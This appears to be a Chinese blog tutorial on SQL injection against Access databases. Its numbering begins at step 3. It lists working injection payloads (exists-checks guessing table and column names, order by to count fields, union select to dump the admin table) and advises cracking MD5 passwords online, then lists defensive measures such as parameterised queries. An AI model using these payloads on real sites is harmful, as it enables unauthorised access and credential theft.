话不多说，直接开干

3.参数后面加 and exists(select * from admin) 猜表名  返回正常页面表示存在(admin)

4. 参数后面加 and exists(select admin from admin)猜(admin)表中是否存在列名(admin) 返回正常页面表示存在

5.参数后面加 and exists(select password from admin)猜(admin)表中是否存在列名(password) 返回正常页面表示存在

6. 判断字段数 参数后面加 order by 10 （判断字段数为10,返回页面正常表示字段为10），15到11返回错误，说明字段只有10

7. 判断回显点参数后面加union select 1,2,3,4,5,6,7,8,9,10 from admin

8.爆出列名的信息参数后面加union select 1,admin,3,4,5,6,7,8,9,10 from admin

9.密码是MD5加密，用在线解密网站解一下就行了

总结一下，防止Access数据库注入的措施可以从以下几个方面进行：

1. 输入验证：对所有用户输入进行严格的验证和过滤，确保只有合法的数据能够进入数据库。验证可以包括对输入的格式、长度、类型等进行检查，以及使用参数化查询来避免直接拼接SQL语句。

2. 编码转换：将用户输入进行编码转换可以防止注入攻击。例如，使用Replace函数将特殊字符（如单引号）进行转换或者编码。

3. 使用存储过程：存储过程是一种预编译的SQL语句，它可以接受参数并返回一个结果。由于存储过程是预编译的，因此可以防止注入攻击。在使用存储过程时，应该避免在存储过程中直接使用用户输入的数据。

4. 使用参数化查询：参数化查询是一种安全的数据库访问方式，它可以防止注入攻击。在使用参数化查询时，应该使用问号（?）作为参数的占位符，并将参数的值在执行查询之前传递给查询语句。

5. 限制数据库用户的权限：将数据库用户的权限限制为仅能执行必要的操作，并禁止其执行其他操作，可以减少注入攻击的风险。

6. 定期更新数据库安全补丁：及时更新数据库的安全补丁可以修复已知的安全漏洞，从而减少注入攻击的风险。

7. 使用安全编码实践：编写安全的数据库访问代码需要遵循一些最佳实践，例如使用参数化查询、避免直接拼接SQL语句、使用正确的数据类型等。

制作不易，希望各位小伙伴点赞转发，拒绝白嫖